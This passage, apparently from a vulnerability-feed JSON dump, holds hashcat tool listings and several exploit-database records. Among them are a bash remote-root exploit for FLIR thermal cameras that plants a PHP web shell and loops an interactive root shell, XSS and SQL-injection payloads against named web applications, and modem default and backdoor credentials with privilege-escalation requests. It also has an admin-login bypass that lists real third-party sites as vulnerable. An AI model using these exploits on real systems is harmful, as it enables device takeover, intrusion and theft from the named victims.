Ethereum Wallet, PBKDF2-HMAC-SHA256 \n * Ethereum Wallet, SCRYPT \n * eCryptfs \n * Android FDE &lt;= 4.3 \n * Android FDE (Samsung DEK) \n * TrueCrypt \n * VeraCrypt \n * LUKS \n * Plaintext \n\n \n\n\n## Attack-Modes \n\n * Straight * \n * Combination \n * Brute-force \n * Hybrid dict + mask \n * Hybrid mask + dict \n* accept Rules \n \n\n\n## Supported OpenCL runtimes \n\n * AMD \n * Apple \n * Intel \n * Mesa (Gallium) \n * NVidia \n * pocl \n\n \n\n\n## Supported OpenCL device types \n\n * GPU \n * CPU \n * APU \n * DSP \n * FPGA \n * Coprocessor \n\n** [ Download Hashcat ](<https://hashcat.net/hashcat/>) **\n", "modified": "2018-08-12T21:07:12", "published": "2018-08-12T21:07:12", "id": "KITPLOIT:438679451792979314", "href": "http://www.kitploit.com/2018/08/hashcat-v421-worlds-fastest-and-most.html", "title": "Hashcat v4.2.1 - World's Fastest and Most Advanced Password Recovery Utility", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-26T07:34:06", "bulletinFamily": "tools", "description": "[  ](<https://4.bp.blogspot.com/-km0iZcDUcmU/WfdndKhtvOI/AAAAAAAAJSE/IyTzhB6S7lUWu4fQXkiiPcNVI7dNYBuywCLcBGAs/s1600/hashcat.png>)\n\n \n\n\n** hashcat ** is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 200 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and OSX, and has facilities to help enable distributed password cracking. \n\n \n\n\n** Installation **\n\nDownload the [ latest release ](<https://hashcat.net/hashcat/>) and unpack it in the desired location. Please remember to use ` 7z x ` when unpacking the archive from the command line to ensure full file paths remain intact. \n\n \n\n\nGPU Driver requirements: \n\n * AMD GPUs on Windows require \"AMD Radeon Software Crimson Edition\" (15.12 or later) \n * AMD GPUs on Linux require \"AMDGPU-PRO Driver\" (16.40 or later) \n * Intel CPUs require \"OpenCL Runtime for Intel Core and Intel Xeon Processors\" (16.1.1 or later) \n * Intel GPUs on Windows require \"OpenCL Driver for Intel Iris and Intel HD Graphics\" \n * Intel GPUs on Linux require \"OpenCL 2.0 GPU Driver Package for Linux\" (2.0 or later) \n * NVIDIA GPUs require \"NVIDIA Driver\" (367.x or later) \n\n \n\n\n## Features \n\n * World's fastest password cracker \n * World's first and only in-kernel rule engine \n * ** Free **\n * ** Open-Source (MIT License) **\n * Multi-OS (Linux, Windows and OSX) \n * Multi-Platform (CPU, GPU, DSP, FPGA, etc., everything that comes with an OpenCL runtime) \n * Multi-Hash (Cracking multiple hashes at the same time) \n * Multi-Devices (Utilizing multiple devices in same system) \n * Multi-Device-Types (Utilizing mixed device types in same system) \n * Supports distributed cracking ** networks ** (using overlay) \n * Supports ** interactive ** pause / resume \n * Supports sessions \n * Supports restore \n * Supports reading password candidates from file and stdin \n * Supports hex-salt and hex-charset \n * Supports automatic ** performance ** tuning \n * Supports automatic keyspace ordering markov-chains \n * Built-in benchmarking system \n * Integrated thermal ** watchdog **\n * ** [ 200+ Hash-types ](<https://hashcat.net/hashcat/#features-algos>) ** implemented with performance in mind \n * ... ** and much more **\n\n** \n**\n\n## Algorithms \n\n * MD4 \n * MD5 \n * Half MD5 (left, mid, right) \n * SHA1 \n * SHA-224 \n * SHA-256 \n * SHA-384 \n * SHA-512 \n * SHA-3 (Keccak) \n * BLAKE2b-512 \n * SipHash \n * Skip32 \n * RIPEMD-160 \n * Whirlpool \n * DES (PT = $salt, key = $pass) \n * 3DES (PT = $salt, key = $pass) \n * ChaCha20 \n * GOST R 34.11-94 \n * GOST R 34.11-2012 (Streebog) 256-bit \n * GOST R 34.11-2012 (Streebog) 512-bit \n * md5($pass.$salt) \n * md5($salt.$pass) \n * md5(unicode($pass).$salt) \n * md5($salt.unicode($pass)) \n * md5($salt.$pass.$salt) \n * md5($salt.md5($pass)) \n * md5($salt.md5($salt.$pass)) \n * md5($salt.md5($pass.$salt)) \n * md5(md5($pass)) \n * md5(md5($pass).md5($salt)) \n * md5(strtoupper(md5($pass))) \n * md5(sha1($pass)) \n * sha1($pass.$salt) \n * sha1($salt.$pass) \n * sha1(unicode($pass).$salt) \n * sha1($salt.unicode($pass)) \n * sha1(sha1($pass)) \n * sha1($salt.sha1($pass)) \n * sha1(md5($pass)) \n * sha1($salt.$pass.$salt) \n * sha1(CX) \n * sha256($pass.$salt) \n * sha256($salt.$pass) \n * sha256(unicode($pass).$salt) \n * sha256($salt.unicode($pass)) \n * sha512($pass.$salt) \n * sha512($salt.$pass) \n * sha512(unicode($pass).$salt) \n * sha512($salt.unicode($pass)) \n * HMAC-MD5 (key = $pass) \n * HMAC-MD5 (key = $salt) \n * HMAC-SHA1 (key = $pass) \n * HMAC-SHA1 (key = $salt) \n * HMAC-SHA256 (key = $pass) \n * HMAC-SHA256 (key = $salt) \n * HMAC-SHA512 (key = $pass) \n * HMAC-SHA512 (key = $salt) \n * PBKDF2-HMAC-MD5 \n * PBKDF2-HMAC-SHA1 \n * PBKDF2-HMAC-SHA256 \n * PBKDF2-HMAC-SHA512 \n * MyBB \n * phpBB3 \n * SMF (Simple Machines Forum) \n * vBulletin \n * IPB (Invision Power Board) \n * WBB (Woltlab Burning Board) \n * osCommerce \n * xt:Commerce \n * PrestaShop \n * MediaWiki B type \n * WordPress \n * Drupal 7 \n * Joomla \n * PHPS \n * Django (SHA-1) \n * Django (PBKDF2-SHA256) \n * Episerver \n * ColdFusion 10+ \n * Apache MD5-APR \n * MySQL \n * PostgreSQL \n * MSSQL \n * Oracle H: Type (Oracle 7+) \n * Oracle S: Type (Oracle 11+) \n * Oracle T: Type (Oracle 12+) \n * Sybase \n * hMailServer \n * DNSSEC (NSEC3) \n * IKE-PSK \n * IPMI2 RAKP \n * iSCSI CHAP \n * CRAM-MD5 \n * MySQL CRAM (SHA1) \n * PostgreSQL CRAM (MD5) \n * SIP digest authentication (MD5) \n * WPA/WPA2 \n * WPA/WPA2 PMK \n * NetNTLMv1 \n * NetNTLMv1+ESS \n * NetNTLMv2 \n * Kerberos 5 AS-REQ Pre-Auth etype 23 \n * Kerberos 5 TGS-REP etype 23 \n * Netscape LDAP SHA/SSHA \n * FileZilla Server \n * LM \n * NTLM \n * Domain Cached Credentials (DCC), MS Cache \n * Domain Cached Credentials 2 (DCC2), MS Cache 2 \n * DPAPI masterkey file v1 and v2 \n * MS-AzureSync PBKDF2-HMAC-SHA256 \n * descrypt \n * bsdicrypt \n * md5crypt \n * sha256crypt \n * sha512crypt \n * bcrypt \n * scrypt \n * macOS v10.4 \n * macOS v10.5 \n * macOS v10.6 \n * macOS v10.7 \n * macOS v10.8 \n * macOS v10.9 \n * macOS v10.10 \n * iTunes backup &lt; 10.0 \n * iTunes backup &gt;= 10.0 \n * AIX {smd5} \n * AIX {ssha1} \n * AIX {ssha256} \n * AIX {ssha512} \n * Cisco-ASA MD5 \n * Cisco-PIX MD5 \n * Cisco-IOS $1$ (MD5) \n * Cisco-IOS type 4 (SHA256) \n * Cisco $8$ (PBKDF2-SHA256) \n * Cisco $9$ (scrypt) \n * Juniper IVE \n * Juniper NetScreen/SSG (ScreenOS) \n * Juniper/NetBSD sha1crypt \n * Fortigate (FortiOS) \n * Samsung Android Password/PIN \n * Windows Phone 8+ PIN/password \n * GRUB 2 \n * CRC32 \n * RACF \n * Radmin2 \n * Redmine \n * PunBB \n * OpenCart \n * Atlassian (PBKDF2-HMAC-SHA1) \n * Citrix NetScaler \n * SAP CODVN B (BCODE) \n * SAP CODVN F/G (PASSCODE) \n * SAP CODVN H (PWDSALTEDHASH) iSSHA-1 \n * PeopleSoft \n * PeopleSoft PS_TOKEN \n * Skype \n * WinZip \n * 7-Zip \n * RAR3-hp \n * RAR5 \n * AxCrypt \n * AxCrypt in-memory SHA1 \n * PDF 1.1 - 1.3 (Acrobat 2 - 4) \n * PDF 1.4 - 1.6 (Acrobat 5 - 8) \n * PDF 1.7 Level 3 (Acrobat 9) \n * PDF 1.7 Level 8 (Acrobat 10 - 11) \n * MS Office &lt;= 2003 MD5 \n * MS Office &lt;= 2003 SHA1 \n * MS Office 2007 \n * MS Office 2010 \n * MS Office 2013 \n * Lotus Notes/Domino 5 \n * Lotus Notes/Domino 6 \n * Lotus Notes/Domino 8 \n * Bitcoin/Litecoin wallet.dat \n * Blockchain, My Wallet \n * Blockchain, My Wallet, V2 \n * 1Password, agilekeychain \n * 1Password, cloudkeychain \n * LastPass \n * Password Safe v2 \n * Password Safe v3 \n * KeePass 1 (AES/Twofish) and KeePass 2 (AES) \n * JKS Java Key Store Private Keys (SHA1) \n * Ethereum Wallet, PBKDF2-HMAC-SHA256 \n * Ethereum Wallet, SCRYPT \n * eCryptfs \n * Android FDE &lt;= 4.3 \n * Android FDE (Samsung DEK) \n * TrueCrypt \n * VeraCrypt \n * LUKS \n * Plaintext \n\n \n\n\n## Attack-Modes \n\n * Straight * \n * Combination \n * Brute-force \n * Hybrid dict + mask \n * Hybrid mask + dict \n* accept Rules \n \n\n\n## Supported OpenCL runtimes \n\n * AMD \n * Apple \n * Intel \n * Mesa (Gallium) \n * NVidia \n * pocl \n\n \n\n\n## Supported OpenCL device types \n\n * GPU \n * CPU \n * APU \n * DSP \n * FPGA \n * Coprocessor \n\n** [ Download Hashcat ](<https://hashcat.net/hashcat/>) **\n", "modified": "2017-10-31T13:12:10", "published": "2017-10-31T13:12:10", "id": "KITPLOIT:6422486000446318290", "href": "http://www.kitploit.com/2017/10/hashcat-v40-worlds-fastest-and-most.html", "title": "Hashcat v4.0 - World's Fastest and Most Advanced Password Recovery Utility", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-01T18:38:55", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-03-29T00:00:00", "published": "2018-03-29T00:00:00", "href": "https://0day.today/exploit/description/30064", "id": "1337DAY-ID-30064", "title": "Crea8Social Social Network Script - Multiple Cross-Site Scripting Vulnerabilities", "type": "zdt", "sourceData": "[-] Title: Multiple Cross-Site Scripting Vulnerabilities in Crea8Social Social Network Script\r\n\r\n[-] Product Description:\r\nCrea8Social is the leading social networking software that helps you build your own custom online community.\r\n\r\n[-] Vulnerability Type:\r\nMultiple Cross-Site Scripting Vulnerabilities (Stored and Reflected)\r\n\r\n[-] Impact and more info:\r\nhttps://www.owasp.org/index.php/Cross-site_Scripting_(XSS)\r\n\r\n[-] Version affected:\r\nCrea8Social Social Network Script \u2013 Pro and Business\r\n\r\n[-] Test Performed:\r\nQuick Trial Security Assessment (not fully tested)\r\n\r\n[-] Vulnerable Request Type:\r\nGET, POST\r\n\r\n[-] Vulnerable Module/Parameter/Path:\r\n1. Stored Cross-Site Scripting Vulnerability in Crea8Social Post comments\r\n2. Stored Cross-Site Scripting Vulnerability in Crea8Social User Profile\r\n3. Stored Cross-Site Scripting Vulnerability in Crea8Social Posts\r\n4. Reflected Cross-Site Scripting Vulnerability in Search feature:\r\n\u2013 [Script_Installation_Domain]/search?term=%22%20onmousemove=%22alert(document.domain)%22\r\n\u2013 [Script_Installation_Domain]/search/dropdown\r\n\r\n[-] Payload used:\r\n<<SCRIPT>alert(\u201cXSS-Here\u201d);//<</SCRIPT>\r\n\r\n[-] Blogpost and Proof of concept Videos:\r\n\u2013 https://www.seekurity.com/blog/general/multiple-cross-site-scripting-vulnerabilities-in-crea8social-social-network-script/\r\n\u2013 https://www.youtube.com/watch?v=bCf0hO9upto\r\n\u2013 https://www.youtube.com/watch?v=QqJFh3Ame9g\r\n\r\n[-] Attack Vectors:\r\n\u2013 Escalation of Privileges: A normal user can create a bogus (user) account on Crea8Social platform hence hijack the Admin\u2019s account and takeover the whole installation.\r\n\u2013 Client Side JS Code Execution: A normal user can create a bogus (user) account on Crea8Social platform with a stored XSS attack vector which will lead to execute JS code on behalf of all the user types passing by the attacker\u2019s public user profile page.\r\n\u2013 Information Disclosure: A normal user can create a bogus (user) account on Crea8Social platform with a rough stored XSS attack vector to perform client side js code execution on other users sessions hence steal their session cookie or their private information from their accounts.\r\n\r\n[-] Fix Suggestion:\r\nFilter and sanitize all the user supplied inputs.\r\n\r\n[-] Advisory(s):\r\n\u2013 CVE-2018-9120\r\n\u2013 CVE-2018-9121\r\n\u2013 CVE-2018-9122\r\n\u2013 CVE-2018-9123\r\n\r\n[-] Product URL(s):\r\nhttps://www.crea8social.com/\r\n\r\n[-] Disclaimer:\r\nThis bug is subject to Seekurity SAS de C.V. responsible disclosure rules which is a 90-day-disclosure-deadline or NON-Responsive vendor. After 90 days elapse, Non-Responsive vendor detection or a patch has been made broadly available, the bug details will become visible to the public through our official communication channels.\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30064"}, {"lastseen": "2018-04-04T19:38:19", "bulletinFamily": "exploit", "description": "FLIR Camera PT-Series suffers from multiple unauthenticated remote command injection vulnerabilities. The vulnerability exist due to several POST parameters in controllerFlirSystem.php script when calling the execFlirSystem() function not being sanitized when using the shell_exec() PHP function while updating the network settings on the affected device. This allows the attacker to execute arbitrary system commands as the root user and bypass access controls in place.", "modified": "2017-09-26T00:00:00", "published": "2017-09-26T00:00:00", "href": "https://0day.today/exploit/description/28632", "id": "1337DAY-ID-28632", "title": "FLIR Systems FLIR Thermal Camera PT-Series (PT-334 200562) Remote Root Exploit", "type": "zdt", "sourceData": "#!/bin/bash\r\n#\r\n#\r\n# FLIR Systems FLIR Thermal Camera PT-Series (PT-334 200562) Remote Root Exploit\r\n#\r\n#\r\n# Vendor: FLIR Systems, Inc.\r\n# Product web page: http://www.flir.com\r\n# Affected version: Firmware version: 8.0.0.64\r\n# Software version: 10.0.2.43\r\n# Release: 1.3.4 GA, 1.3.3 GA and 1.3.2\r\n#\r\n# Summary: FLIR's PT-Series of high-performance, multi-sensor pan/tilt cameras\r\n# bring thermal and visible-light imaging together in a system that gives you\r\n# video and control over both IP and analog networks. The PT-Series' precision\r\n# pan/tilt mechanism gives you accurate pointing control while providing fully\r\n# programmable scan patterns, radar slew-to-cue, and slew-to-alarm functions.\r\n# PT-Series cameras define a new standard of performance with five models that\r\n# provide full 640x480 thermal resolution.\r\n#\r\n# Desc: FLIR Camera PT-Series suffers from multiple unauthenticated remote command\r\n# injection vulnerabilities. The vulnerability exist due to several POST parameters\r\n# in controllerFlirSystem.php script when calling the execFlirSystem() function not\r\n# being sanitized when using the shell_exec() PHP function while updating the network\r\n# settings on the affected device. This allows the attacker to execute arbitrary system\r\n# commands as the root user and bypass access controls in place.\r\n#\r\n# ========================================================\r\n#\r\n# bash-3.2$ ./flir0.sh 10.0.0.10 8088\r\n#\r\n# Probing target: http://10.0.0.10:8088\r\n#\r\n# Status: 200\r\n# Target seems OK!\r\n# You got shell!\r\n# Ctrl+C to exit.\r\n#\r\n# [[email\u00a0protected] ~]# id;pwd;uname -a\r\n# uid=0(root) gid=0(root)\r\n# /var/www/data/maintenance\r\n# Linux FLIR 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082 #1 Wed May 1 12:25:27 PDT 2013 armv5tejl unknown\r\n# [[email\u00a0protected] ~]# ^C\r\n# bash-3.2$ \r\n#\r\n# ========================================================\r\n#\r\n# Tested on: Linux 2.6.18_pro500-davinci_evm-arm_v5t_le\r\n# Linux 2.6.10_mvl401-davinci_evm-PSP_01_30_00_082\r\n# Nexus Server/2.5.29.0\r\n# Nexus Server/2.5.14.0\r\n# Nexus Server/2.5.13.0\r\n# lighttpd/1.4.28\r\n# PHP/5.4.7\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2017-5438\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5438.php\r\n#\r\n#\r\n# 23.03.2017\r\n#\r\n\r\n\r\nset -euo pipefail\r\nIFS=$'\\n\\t'\r\n\r\nif [ \"$#\" -ne 2 ]; then\r\n echo -e \"Usage: $0 ipaddr port\\\\n\"\r\n exit 1\r\nfi\r\n\r\nip=$1\r\nport=$2\r\necho -e \"\\\\nProbing target: http://$ip:$port\\\\n\"\r\n\r\npayload=\"dns%5Bdhcp%5D=%60echo+\\\"<?php+system(\\\\\\\\\\$_GET['c']);?>\\\">test.php%60&dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=\"\r\nhtcode=$(curl -Is -G http://\"$ip\":\"$port\"/maintenance/controllerFlirSystem.php -d\"$payload\" 2>/dev/null | head -1 | awk -F\" \" '{print $2}')\r\n\r\necho -ne \"Status: \"; echo \"$htcode\"\r\n\r\nif [ \"$htcode\" == \"200\" ]; then\r\n echo \"Target seems OK!\"\r\nelse\r\n echo \"Ajdee...something went wrong. Check your target.\"\r\n exit 1\r\nfi\r\n\r\necho -e \"You got shell!\\\\nCtrl+C to exit.\\\\n\"\r\n\r\nwhile true; do\r\n echo -ne \"\\\\033[31m\";\r\n read -rp \"[[email\u00a0protected] ~]# \" cmd\r\n echo -ne \"\\\\033[00m\";\r\n shell=\"http://$ip:$port/maintenance/test.php?c=${cmd// /+}\"\r\n curl \"$shell\"\r\ndone\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28632"}, {"lastseen": "2018-02-18T21:26:34", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-08-19T00:00:00", "published": "2017-08-19T00:00:00", "href": "https://0day.today/exploit/description/28320", "id": "1337DAY-ID-28320", "type": "zdt", "title": "LiveInvoices 1.0 - SQL Injection Vulnerability", "sourceData": "# # # # #\r\n# Exploit Title: LiveInvoices 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 18.08.2017\r\n# Vendor Homepage : http://livecrm.co/\r\n# Software Link: https://codecanyon.net/item/liveinvoices-complete-invoicing-system-crm/20243375\r\n# Demo: http://liveinvoices.livecrm.co/livecrm/web/\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# Author Web: http://ihsan.net\r\n# Author Social: @ihsansencan\r\n# # # # #\r\n# Description:\r\n# The vulnerability allows the users to inject sql commands ...\r\n# \r\n# Proof of Concept:\r\n# \r\n# http://localhost/[PATH]/index.php?r=estimate/estimate/view&id=[SQL]\r\n# 62++/*!11111UnioN*/(/*!11111sELECt*/+0x283129,0x283229,0x283329,0x283429,(select(@x)/*!22222from*/(/*!22222select*/(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(/*!22222select*/(0)/*!22222from*/(information_schema.columns)/*!22222where*/(table_schema=database())and(0x00)in(@x:=/*!22222CoNcaT*/(@x,0x3c62723e,if((@tbl!=table_name),/*!22222CoNcaT*/(0x3c2f6469763e,LPAD(@running_number:[email\u00a0protected]_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),0x00),lpad(@z:[email\u00a0protected]%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329)--+-\r\n# \r\n# http://localhost/[PATH]/index.php?r=invoice/invoice/view&id=[SQL]\r\n# \r\n# Etc...\r\n# # # # #\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/28320", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-27T01:16:24", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2015-10-15T00:00:00", "published": "2015-10-15T00:00:00", "id": "1337DAY-ID-24453", "href": "https://0day.today/exploit/description/24453", "type": "zdt", "title": "PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities", "sourceData": "# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple\r\nVulnerabilities]\r\n# Discovered by: Karn Ganeshen\r\n# Reported on: [October 13, 2015]\r\n# Vendor Response: [No process to handle vuln reports]\r\n# Vendor Homepage: [\r\nhttp://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]\r\n# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]\r\n \r\n \r\n**Vulnerability Details**\r\n \r\n*1. Default, weak passwords for http and ftp services *\r\n \r\na. *HTTP accounts*\r\n- admin/password\r\n- user/user\r\n- guest/XXXXairocon\r\n \r\n<chain N=\"USERNAME_PASSWORD\">\r\n<V N=\"FLAG\" V=\"0x0\"/>\r\n<V N=\"USERNAME\" V=\"admin\"/>\r\n<V N=\"PASSWORD\" V=\"password\"/>\r\n<V N=\"BACKDOOR\" V=\"0x0\"/>\r\n<V N=\"PRIORITY\" V=\"0x2\"/>\r\n</chain>\r\n \r\n<chain N=\"USERNAME_PASSWORD\">\r\n<V N=\"FLAG\" V=\"0x0\"/>\r\n<V N=\"USERNAME\" V=\"user\"/>\r\n<V N=\"PASSWORD\" V=\"user\"/>\r\n<V N=\"BACKDOOR\" V=\"0x0\"/>\r\n<V N=\"PRIORITY\" V=\"0x0\"/> </chain>\r\n \r\n<chain N=\"USERNAME_PASSWORD\">\r\n<V N=\"FLAG\" V=\"0x0\"/>\r\n<V N=\"USERNAME\" V=\"guest\"/>\r\n<V N=\"PASSWORD\" V=\"XXXXairocon\"/>\r\n<V N=\"BACKDOOR\" V=\"0x1\"/>\r\n<V N=\"PRIORITY\" V=\"0x1\"/> </chain>\r\n \r\n*XXXX -> last four digits of MAC address *\r\n \r\nb. *FTP accounts*\r\n \r\n- admin/admin\r\n- useradmin/useradmin\r\n- user/user\r\n \r\n<chain N=\"FTP_SERVER\">\r\n<V N=\"ENABLE\" V=\"0x1\"/>\r\n<V N=\"USERNAME\" V=\"admin\"/>\r\n<V N=\"PASSWORD\" V=\"admin\"/>\r\n<V N=\"PORT\" V=\"0x15\"/>\r\n<V N=\"USERRIGHT\" V=\"0x3\"/>\r\n<V N=\"INSTNUM\" V=\"0x1\"/> </chain>\r\n \r\n<chain N=\"FTP_SERVER\">\r\n<V N=\"ENABLE\" V=\"0x1\"/>\r\n<V N=\"USERNAME\" V=\"useradmin\"/>\r\n<V N=\"PASSWORD\" V=\"useradmin\"/>\r\n<V N=\"PORT\" V=\"0x15\"/>\r\n<V N=\"USERRIGHT\" V=\"0x2\"/>\r\n<V N=\"INSTNUM\" V=\"0x2\"/> </chain>\r\n \r\n<chain N=\"FTP_SERVER\">\r\n<V N=\"ENABLE\" V=\"0x1\"/>\r\n<V N=\"USERNAME\" V=\"user\"/>\r\n<V N=\"PASSWORD\" V=\"user\"/>\r\n<V N=\"PORT\" V=\"0x15\"/>\r\n<V N=\"USERRIGHT\" V=\"0x1\"/>\r\n<V N=\"INSTNUM\" V=\"0x3\"/> </chain>\r\n \r\n \r\n2. *Backdoor accounts*\r\nThe device comes configured with privileged, backdoor account.\r\n \r\nFor HTTP, 'guest' with attribute <V N=\"BACKDOOR\" V=\"0x1\"/>, is the backdoor\r\naccount. This is seen in the config file:\r\n \r\n<chain N=\"USERNAME_PASSWORD\">\r\n<V N=\"FLAG\" V=\"0x0\"/>\r\n<V N=\"USERNAME\" V=\"guest\"/>\r\n<V N=\"PASSWORD\" V=\"XXXXairocon\"/>\r\n<V N=\"BACKDOOR\" V=\"0x1\"/>\r\n<V N=\"PRIORITY\" V=\"0x1\"/>\r\n</chain>\r\n \r\nThis user is not shown / visible in the user list when logged in as admin\r\n(privileged user).\r\n \r\n \r\n3. *No CSRF protection*\r\nThere is no CSRF token set in any of the forms / pages.\r\n \r\nIt is possible to silently execute HTTP requests if the user is logged in.\r\n \r\n \r\n4. *Weak RBAC controls *\r\n \r\n5a) *A non-admin user (user) can create and delete any other users,\r\nincluding root-privileged accounts. *\r\n \r\nThere are three users:\r\n \r\nadmin:password -> priv 2 is super user account with full functional access\r\n(admin/root)\r\nuser:user -> priv 0 -> can access only some functions (user)\r\nguest:XXXXairocon -> privileged backdoor login\r\n \r\n \r\n*Normally: *\r\n \r\n- user can create new account with restricted user privs only.\r\n- user can change its password and only other non-admin users.\r\n- user can delete any other non-admin users.\r\n \r\nHowever, the application does not enforce strict rbac and it is possible\r\nfor a non-admin user to create a new account with admin privileges.\r\n \r\n \r\nThis is done as follows:\r\n \r\n1. Start creating a new user, and intercepting the user creation POST\r\nrequest\r\n2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin)\r\n- Submit request\r\n3. When the new admin user is created successfully, it does not show up in\r\nuser list\r\n4. Confirm via logging in as new admin, and / or configured accounts in\r\nconfiguration file (config.img)\r\n \r\n \r\nThis is the POST request to create a new user:\r\n \r\n*Create user http request*:\r\n \r\nPOST /form2userconfig.cgi HTTP/1.1\r\nHost: <IP>\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101\r\nFirefox/38.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nReferer: http://<IP>/userconfig.htm?v=\r\nCookie: SessionID=\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 115\r\nusername=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=\r\n \r\n \r\n*Note1*: In some cases, this password change function is not accessible to\r\n'user' via GUI. But we can still send a POST request to create a valid, new\r\nhigher privileged account.\r\n \r\n*Note2*: In some cases, application does not create admin priv user, in the\r\nfirst attempt. However, in the 2nd or 3rd attempt, new user is created\r\nwithout any issue.\r\n \r\n \r\n*Delete user http request:*\r\nA non-admin user can delete any configured user(s) including privileged\r\nusers (admin).\r\n \r\nPOST /form2userconfig.cgi HTTP/1.1\r\nHost: <ip>\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101\r\nFirefox/38.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nReferer: http://<IP>/userconfig.htm\r\nCookie: SessionID=\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 131\r\nusername=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%\r\n \r\n \r\nIn case (non-admin) user is deleting the admin login (priv 2), action\r\nstatus can be confirmed by checking the configuration.\r\nIn case (non-admin) user is deleting another user login (priv 0), action\r\nstatus can be confirmed by checking the user list.\r\n \r\n \r\n5b) *(non-admin priv) User can access unauthorized functions.*\r\nNormally, 'user' does not have access to all the functionality of the\r\ndevice. It has access to Status, Setup and Maintenance.\r\n \r\nHowever, few functions can still be accessed by calling them directly. For\r\nexample, to access the mac filtering configuration this url can be opened\r\ndirectly:\r\n \r\nhttp://<IP>/fw-macfilter.htm\r\n \r\nOther functions may also be accessible in this manner.\r\n \r\n \r\n6. *Sensitive information not secured from low privileged users *\r\n \r\nA non-admin privileged user has access to download the configuration file\r\n- config.img.\r\n \r\nThis file contains clear-text passwords, keys and other sensitive\r\ninformation which can be used to gain privileged access.\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24453"}, {"lastseen": "2018-01-08T21:06:38", "bulletinFamily": "exploit", "description": "Exploit for asp platform in category web applications", "modified": "2013-11-08T00:00:00", "published": "2013-11-08T00:00:00", "id": "1337DAY-ID-21485", "href": "https://0day.today/exploit/description/21485", "type": "zdt", "title": "RASPcalendar 1.01 - Admin Login bypass Vulnerability", "sourceData": "---------------------------------------------------\r\nRASPcalendar 1.01 - Admin Login bypass Vulnerability\r\n---------------------------------------------------\r\nAuthor : Hackeri-AL\r\nDate : 06-11-2013\r\nVendor Homepage : http://www.rttucson.com/files.html\r\nSoftware link : http://www.rttucson.com/RASPcalendar.zip\r\nVerison : 1.01\r\nTested On : Windows XP\r\n------------------------------------------------------------\r\n \r\nGoogle Dork: allinurl:RASPcalendar \"powered by RASPcalendar\"\r\n \r\n------------------------------------------------------------\r\n \r\nExample : http://www.usfim.it/RASPcalendar/\r\n : http://site.com/events\r\n : http://site.com/calendar\r\n : etc...\r\n \r\nGo to : http://www.usfim.it/RASPcalendar/admin/\r\n \r\nUserName : 1'or'1\r\nPassWord : 1'or'1\r\n \r\nLogin Success Fully :D\r\n \r\n------------------------------------------------------------\r\n \r\nVuln sites demo :\r\n \r\nhttp://www.usfim.it/RASPcalendar/admin\r\nhttp://www.davemitchellassociates.com/events/admin\r\nhttp://www.bradandrebecca.com/Calendar/admin\r\nhttp://www.hlubline.com/pt/calendar/admin\r\n \r\n------------------------------------------------------------\r\n \r\nFound By Hackeri-AL , UAH-Crew Group 2009-2013\r\n \r\nUNITED ALBANIAN HACKERS , Thnx to LoocK3D & b4cKd00r ~\r\n \r\n[~] Legends Of Albania\r\n \r\n------------------------------------------------------------\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21485"}], "hackapp": [{"lastseen": "2016-09-26T20:43:32", "bulletinFamily": "software", "hackapp": {"bugs": [{"severity": "notice", "name": "Native code usage", "description": "Native code (.so) usage 'System.loadLibrary();' is found.", "id": 